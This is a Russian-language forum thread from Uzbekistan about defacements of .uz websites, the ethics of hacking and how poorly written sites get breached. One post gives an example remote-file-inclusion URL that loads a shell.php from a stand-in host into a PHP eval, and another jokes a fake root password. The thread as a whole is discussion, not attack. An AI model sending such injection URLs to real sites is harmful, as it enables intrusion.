![]() |
Взломы в зоне .UZ
Народ, разместите сюда информации о взломанных сайтах с анализами взлома. Надеюсь, это будеть всем полезно, особенно для не профессионалам по безопасности.
Недавно взломаны сайт Каракалпакстан-онлайн: kr.uz и его форум с 19 летного взломщика из России. Модераторы сказали, что атака устроена через опрос-форма сайта. Если у Вас еще какие то инфы, пишите плиз... |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
- Знаешь как узбекские сайты ломают? - Нет - Пойдем покажу, потом сами попробуем... |
не хотелось создать новую тему !
можно ли создать сайты посвешоные комп безопасности ну в росии есть типа zloy.ru...ну у них еще дефейс ленты есть! их владельсов и пользователей не трогают у нас тоже так? или нельзя? |
Цитата:
И в большинстве случаев атакующие оставляют запись типа - "Админ, обрати внимание на порт такой-то или дыру там-то" - то есть, подсказывают, где и что не закрыто. Благородно так... Писал об этом большую статью - есть на сайте журнала. |
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
|
Цитата:
Можно,но не как zloy. Правила не позволяют. Там не только безопасность, но и хакинг, варез. Вот электронный журнал по информационной безопасности http://www.security.uz/ |
Цитата:
Как учится людям IT, если не иметь понятия что такое хакинг ? В зоне Уз более 50% сайтов подверженные атаке... и кто в этом виноват ? программисты.. которые не знают все уловки и не могут мыслить как хакеры. Те кто используют Хак в противозаконных целях меня бесят... но те кто задумываются над тем что это не только плохо и противозаконно... но так же и то что они портят жизнь номральным людям... Мое мнение... в сети Уз должен быть хоть один сайт про Хакинг... что бы люди читали статьи о взломах и понимали что это плохо.. лучше всего помогать другим и докладывать о каждой ошибке.... Если я не прав, поправьте меня... |
Цитата:
И вообще, что вы подразумеваете под словом "хак"? У нас наверное совсем разные понятия. Цитата:
Не буду с Вами спорить, Цитата:
Цитата:
|
Цитата:
Цитата:
И если можно объясните что вы имели в виду под предложением А на счет фильмов про хакеров... может кто то и смотрит в надежде чему либо научится... я не из их числа xD Надеюсь уязвимых ошибок в словах не оставил... =))))) |
Цитата:
Цитата:
Цитата:
|
Я думаю тема правильная. Обсуждать и исправлять на будущее это лучше, чем потом сопли жувать)
|
Цитата:
Один раз ко мне постучался знакомый, PHP занимается 3 года, попросил нарисовать и сверстать шаблон под главную... Но как только я глянул в код, я ахнул!!!! он решил засунуть переменную под евал PHP код:
http://test.ru/index.php?test=http://xak/shell.php Вот вам и самописные двиги которые трудно ломать =D А на счет что если закрыть SQL Inj и все беды решены вы очень сильно заблуждаетесь.... SQL INJ PHP INJ XSS все виды Не защищеные поля веб форм Раскрытие путей и прочии ошибки... |
Цитата:
Цитата:
|
Цитата:
У веб серверов логики не какой нету, это искусственный разум =) Максимум что вы сможете сделать на веб сервере это урезать права на выполнение скриптов, а дырки то все равно останутся, и заметьте новые фильтры на обход защиты появляются все чаще и чаще. |
Интересно получается - людям больше интересно не как защитить сайт, а как его могут сломать :)
Сломать могут по разному - нет универсальной защиты. Если програмист грамотный и админ не ленивый - то школяры уже не сломают, только профи - но какому профи будет интересен узбекский сайт ? Имхо ИКТ в нашей стране еще настолько не развит что получить выгоду от "ломки" никто не сможет, а профи ради спортивного интереса не ломают. Тем паче что сейчас Китай дает такие ресурсы и мощности, что даже дидосеры перестали ломать обычные сайты. Если не лень - обычно все стараются банить весь китайский диапазон адресов - обычно лезут оттуда, а обывателю из Китая - нечего делать на наших сайтах. |
Не думаю что такой ресурс нужен. И без него навалом баг трекеров и прочего. В общей сложности методы взлома однообразны, достаточно почитать общие статьи на эти темы коих в нете навалом и применить их к своим реалиям, а также внимательно следить за баг трекерами используемого программного обеспечения, и не ленится что-то делать, ужасно много взломов из за элементарной лени (не стали дописывать пару строчек кода для проверки, админ поленился досконально настроить права и т.д.). В 90% случаев этого будет достаточно. А другим 10% как уже было сказано Узбекистан нафиг не нужен.
|
Цитата:
Оффтоп: ерунда, это можна писать как и для одминов, да и руководства для хакеров, можна найти где угодно, а опытом (не хакерским, а из анализа исходящего - одминским) поделиться я считаю можнаЦитата:
Оффтоп: чушь, за Цитата:
|
Цитата:
|
Цитата:
Оффтоп: это типа на сайте будет раздел такого содержания: Руководство для хакера... как взломать uzinfocom ? для этого надо подключится к серверу через ssh (putty) в ввести в login: root , а password: 86hhyqiiy564g , после авторизации сервер полностью ваш .... :biggrin: |
Цитата:
Цитата:
Цитата:
Оффтоп: Вам бы в НУУЗе нейронные сети и искусственный интелект преподавать, спросите Николая Александровича |
Оффтоп: Цитата:
За горло брать будете лично Вы? Могилку копать тоже? Я вообще не понял к чему это все было сказано? |
Цитата:
Оффтоп: не бейте меня, обращение не к вам а риторическоеа сказано это былы к тому, что суть диалога вашего - просто напросто набор слов из головы, и если ВЫ действительно считаете, что два 15-летних пацана (а других кулхацкеров у нас нет), завидут такой вот диалог начитавшись этой ветки, то я и говорю, что это чушь! Оффтоп: или Вы сами заведете, такой вот диалог?? тогда канешна, я глубоко извеняюсь за все что писалось раньше, потому как -да, тогда это можно принять на свой счет |
Цитата:
Цитата:
Я не знаю кто такие "кулхацкеры", есть ли они у нас в стране и каков их возростной состав. Тем более я не знаю, какие разговоры они могут вести. |
Цитата:
Оффтоп: заценил =) ну тогда суть этой фразы в студию, потому как я значица неправильно ее истолковал.. |
Оффтоп: Цитата:
Теперь Вы сравниваете меня с "15-летним кулхацкером", т.к. по Вашему мнению именно им свойственны такие диалоги. У Вас проблемы, Вы хотите об этом поговорить? Я Вам чем-то не нравлюсь? Есть раздел "К барьеру". |
Оффтоп: Цитата:
Цитата:
Цитата:
Цитата:
Цитата:
|
Цитата:
|
Оффтоп: Цитата:
|
Дефейс joomla.uz
Дефейс joomla.uz
Собственно сабж, уже не первый месяц так стоит как я понял. Код:
HACKED BY:N0FAC3 JOOMLA.UZ HACKED BY E404 a.k.a N0FAC3 http://www.youtube.com/watch?v=UW0A1rY_qY8 Видео загружено 06.05.2011 |
Наверняка нашли дыру в устаревшей версии движка. Обновляться вовремя надо...
|
http://womenfootball.uz/ тоже. Руки им поотрывать!
|
Текущее время: 16:00. Часовой пояс GMT +5. |
Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd. Перевод:
OOO «Единый интегратор UZINFOCOM»